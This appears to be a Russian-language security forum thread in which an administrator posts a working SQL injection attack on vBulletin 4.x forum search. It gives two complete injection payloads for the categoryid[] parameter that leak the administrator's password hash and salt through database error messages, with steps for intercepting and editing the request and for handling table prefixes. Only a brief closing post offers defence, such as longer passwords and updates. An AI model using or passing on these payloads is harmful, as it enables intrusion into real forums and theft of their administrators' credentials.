• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Уязвимость в vBulletin 4


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 175
Уязвимость пашет на vBulletin 4.1.4 на движках 4.х.х тоже должна фурычить.

amicmsdx71.jpg
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 175
Заходим, регистрируемся (не всегда обязательно, если поиск без всяких там капч и вопросов от имени гостя проходит, то рега не впёрлась).

Запускаем лису, плагин liveHTTPHeaders.

Вбиваем в поле поиска любую лабуду, например "4234234" и жмём enter

В liveHTTPHeaders редактируем запрос таким вот образом, дописывая это:

Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

Посмотреть вложение 99

Отправляем запрос, выйдет ошибка Database error
Смотрим исходный код, внизу находим хэш, записываем.

Теперь оправляем запрос на вывод соли, вот такой:

Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*


Опять ошибка, опять смотрим исходный код, записываем соль.

Всё, осталось только расшифровать.

Иногда таблица не user называется, тогда хэш мы не увидим, а увидим на месте хэша какую-то лабуду, а чуть выше виден будет префикс, вот его и дописываем в наш запрос, и тогда всё бенч будет.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 175
Как защититься:

Установить пароль не менее 12-ть символов, тогда хэш будет тяжело расшифровать.

Также рекомендую следить за обновлениями булки, так-как у неё КУЧА уязвимостей.

И самое главное, постарайтесь никого не злить и тогда взламывать никто не будет ! ;)
 
Автор темы Похожие темы Форум Ответы Дата
0 Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 0
Антоха Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 1
X-Shar Новости и статьи IT безопасности 0
R Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 1
X-Shar Новости и статьи IT безопасности 3
X-Shar Новости и статьи IT безопасности 0
Ворошилов Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 0
Верх Низ